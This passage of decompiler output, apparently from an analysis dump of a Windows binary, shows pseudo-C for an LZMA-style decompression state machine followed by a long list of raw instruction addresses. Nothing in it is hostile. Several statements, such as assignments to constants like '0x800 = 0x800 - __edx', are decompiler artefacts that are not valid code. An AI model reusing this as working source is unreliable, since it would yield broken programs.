											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x00407033
0x00407033
0x00407033
0x00407033
0x00407039
0x0040703d
0x00407041
0x0040704b
0x00407059
0x0040732f
0x0040732f
0x00407332
0x00407339
0x00407366
0x00407366
0x0040736a
0x00000000
0x00000000
0x0040736c
0x00407375
0x0040737b
0x0040737e
0x00407381
0x00407384
0x00407387
0x0040738d
0x004073a6
0x004073a9
0x004073b5
0x004073b6
0x004073b9
0x0040738f
0x0040738f
0x0040739e
0x004073a1
0x004073a1
0x004073c3
0x00407363
0x00407363
0x00407363
0x00407366
0x0040736a
0x00000000
0x00000000
0x00000000
0x004073c5
0x004073c5
0x0040733e
0x00407342
0x0040747a
0x0040747a
0x00407484
0x0040748c
0x00407493
0x00407495
0x0040749c
0x004074a0
0x004074a0
0x00407348
0x0040734e
0x00407355
0x0040735d
0x0040735d
0x00407360
0x00000000
0x00407360
0x004073ca
0x004073d7
0x004073da
0x004072e6
0x004072e6
0x004072e6
0x00406a82
0x00406a82
0x00406a82
0x00406a8b
0x00000000
0x00000000
0x00406a91
0x00406a91
0x00000000
0x00406a98
0x00406a9c
0x00000000
0x00000000
0x00406aa2
0x00406aa5
0x00406aa8
0x00406aab
0x00406aaf
0x00000000
0x00000000
0x00406ab5
0x00406ab5
0x00406ab8
0x00406aba
0x00406abb
0x00406abe
0x00406ac0
0x00406ac1
0x00406ac3
0x00406ac6
0x00406acb
0x00406ad0
0x00406ad9
0x00406aec
0x00406aef
0x00406afb
0x00406b23
0x00406b25
0x00406b33
0x00406b33
0x00406b37
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b27
0x00406b27
0x00406b2a
0x00406b2b
0x00406b2b
0x00000000
0x00406b27
0x00406afd
0x00406b01
0x00406b06
0x00406b06
0x00406b0f
0x00406b17
0x00406b1a
0x00000000
0x00406b20
0x00406b20
0x00000000
0x00406b20
0x00000000
0x00406b3d
0x00406b3d
0x00406b41
0x004073ed
0x004073ed
0x00000000
0x004073ed
0x00406b47
0x00406b4a
0x00406b5a
0x00406b5d
0x00406b60
0x00406b60
0x00406b60
0x00406b63
0x00406b67
0x00000000
0x00000000
0x00406b69
0x00406b69
0x00406b6f
0x00406b99
0x00406b9f
0x00406ba6
0x00000000
0x00406ba6
0x00406b71
0x00406b75
0x00406b78
0x00406b7d
0x00406b7d
0x00406b88
0x00406b90
0x00406b93
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406bd8
0x00406bde
0x00406be1
0x00406bee
0x00406bf6
0x00000000
0x00000000
0x00406bad
0x00406bad
0x00406bb1
0x004073fc
0x004073fc
0x00000000
0x004073fc
0x00406bb7
0x00406bbd
0x00406bc8
0x00406bc8
0x00406bc8
0x00406bcb
0x00406bce
0x00406bd1
0x00406bd6
0x00000000
0x00000000
0x00000000
0x00000000
0x0040726d
0x0040726d
0x00407273
0x00407279
0x0040727f
0x00407299
0x0040729c
0x004072a2
0x004072ad
0x004072ad
0x004072af
0x00407281
0x00407281
0x00407290
0x00407294
0x00407294
0x004072b9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004072bb
0x004072bf
0x0040746e
0x0040746e
0x00000000
0x0040746e
0x004072c5
0x004072cb
0x004072d2
0x004072da
0x004072dd
0x004072e0
0x004072e0
0x004072e6
0x004072e6
0x00000000
0x00000000
0x00406bfe
0x00406bfe
0x00406c00
0x00406c03
0x00406c74
0x00406c74
0x00406c77
0x00406c7a
0x00406c81
0x00406c8b
0x00000000
0x00406c8b
0x00406c05
0x00406c05
0x00406c09
0x00406c0c
0x00406c0e
0x00406c11
0x00406c14
0x00406c16
0x00406c19
0x00406c1b
0x00406c20
0x00406c23
0x00406c26
0x00406c2a
0x00406c31
0x00406c34
0x00406c3b
0x00406c3f
0x00406c47
0x00406c47
0x00406c47
0x00406c41
0x00406c41
0x00406c41
0x00406c36
0x00406c36
0x00406c36
0x00406c4b
0x00406c4e
0x00406c6c
0x00406c6c
0x00406c6e
0x00000000
0x00406c50
0x00406c50
0x00406c50
0x00406c53
0x00406c56
0x00406c59
0x00406c5b
0x00406c5b
0x00406c5b
0x00406c5e
0x00406c61
0x00406c63
0x00406c64
0x00406c67
0x00000000
0x00406c67
0x00000000
0x00406e9d
0x00406e9d
0x00406ea1
0x00406ebf
0x00406ebf
0x00406ec2
0x00406ec9
0x00406ecc
0x00406ecf
0x00406ed2
0x00406ed5
0x00406ed8
0x00406eda
0x00406ee1
0x00406ee2
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406eed
0x00406ef2
0x00000000
0x00406ef2
0x00406ea3
0x00406ea3
0x00406ea6
0x00406ea9
0x00406eb3
0x00000000
0x00000000
0x00406f07
0x00406f07
0x00406f0b
0x00406f2e
0x00406f31
0x00406f34
0x00406f3e
0x00406f0d
0x00406f0d
0x00406f10
0x00406f13
0x00406f16
0x00406f23
0x00406f26
0x00406f26
0x00000000
0x00000000
0x00406f4a
0x00406f4a
0x00406f4e
0x00000000
0x00000000
0x00406f54
0x00406f54
0x00406f58
0x00000000
0x00000000
0x00406f5e
0x00406f5e
0x00406f60
0x00406f64
0x00406f64
0x00406f67
0x00406f6b
0x00000000
0x00000000
0x00406fbb
0x00406fbb
0x00406fbf
0x00406fc6
0x00406fc6
0x00406fc9
0x00406fcc
0x00406fd6
0x00000000
0x00406fd6
0x00406fc1
0x00406fc1
0x00000000
0x00000000
0x00406fe2
0x00406fe2
0x00406fe6
0x00406fed
0x00406ff0
0x00406ff3
0x00406fe8
0x00406fe8
0x00406fe8
0x00406ff6
0x00406ff9
0x00406ffc
0x00406ffc
0x00406fff
0x00407002
0x00407005
0x00407005
0x00407008
0x0040700f
0x00407014
0x00000000
0x00000000
0x004070a2
0x004070a2
0x004070a6
0x00407444
0x00407444
0x00000000
0x00407444
0x004070ac
0x004070ac
0x004070af
0x004070b2
0x004070b6
0x004070b9
0x004070bf
0x004070c1
0x004070c1
0x004070c1
0x004070c4
0x004070c7
0x00000000
0x00000000
0x00406c97
0x00406c97
0x00406c9b
0x00407408
0x00407408
0x00000000
0x00407408
0x00406ca1
0x00406ca1
0x00406ca4
0x00406ca7
0x00406cab
0x00406cae
0x00406cb4
0x00406cb6
0x00406cb6
0x00406cb6
0x00406cb9
0x00406cbc
0x00406cbc
0x00406cbf
0x00406cc2
0x00000000
0x00000000
0x00406cc8
0x00406cc8
0x00406cce
0x00000000
0x00000000
0x00406cd4
0x00406cd4
0x00406cd8
0x00406cdb
0x00406cde
0x00406ce1
0x00406ce4
0x00406ce5
0x00406ce8
0x00406cea
0x00406cf0
0x00406cf3
0x00406cf6
0x00406cf9
0x00406cfc
0x00406cff
0x00406d02
0x00406d1e
0x00406d21
0x00406d24
0x00406d27
0x00406d2e
0x00406d32
0x00406d34
0x00406d38
0x00406d04
0x00406d04
0x00406d08
0x00406d10
0x00406d15
0x00406d17
0x00406d19
0x00406d19
0x00406d3b
0x00406d42
0x00406d45
0x00000000
0x00406d4b
0x00406d4b
0x00000000
0x00406d4b
0x00000000
0x00406d50
0x00406d50
0x00406d54
0x00407414
0x00407414
0x00000000
0x00407414
0x00406d5a
0x00406d5a
0x00406d5d
0x00406d60
0x00406d64
0x00406d67
0x00406d6d
0x00406d6f
0x00406d6f
0x00406d6f
0x00406d72
0x00406d75
0x00406d75
0x00406d75
0x00406d7b
0x00000000
0x00000000
0x00406d7d
0x00406d7d
0x00406d80
0x00406d83
0x00406d86
0x00406d89
0x00406d8c
0x00406d8f
0x00406d92
0x00406d95
0x00406d98
0x00406d9b
0x00406db3
0x00406db6
0x00406db9
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc3
0x00406dc5
0x00406d9d
0x00406d9d
0x00406da5
0x00406daa
0x00406dac
0x00406dae
0x00406dae
0x00406dc8
0x00406dcf
0x00406dd2
0x00000000
0x00406dd4
0x00406dd4
0x00000000
0x00406dd4
0x00406dd2
0x00406dd9
0x00406dd9
0x00406dd9
0x00406dd9
0x00000000
0x00000000
0x00406e14
0x00406e14
0x00406e18
0x00407420
0x00407420
0x00000000
0x00407420
0x00406e1e
0x00406e1e
0x00406e21
0x00406e24
0x00406e28
0x00406e2b
0x00406e31
0x00406e33
0x00406e33
0x00406e33
0x00406e36
0x00406e39
0x00406e39
0x00406e3f
0x00406ddd
0x00406ddd
0x00406de0
0x00000000
0x00406de0
0x00406e41
0x00406e41
0x00406e44
0x00406e47
0x00406e4a
0x00406e4d
0x00406e50
0x00406e53
0x00406e56
0x00406e59
0x00406e5c
0x00406e5f
0x00406e77
0x00406e7a
0x00406e7d
0x00406e80
0x00406e80
0x00406e83
0x00406e87
0x00406e89
0x00406e61
0x00406e61
0x00406e69
0x00406e6e
0x00406e70
0x00406e72
0x00406e72
0x00406e8c
0x00406e93
0x00406e96
0x00000000
0x00406e98
0x00406e98
0x00000000
0x00406e98
0x00000000
0x00407125
0x00407125
0x00407129
0x00407450
0x00407450
0x00000000
0x00407450
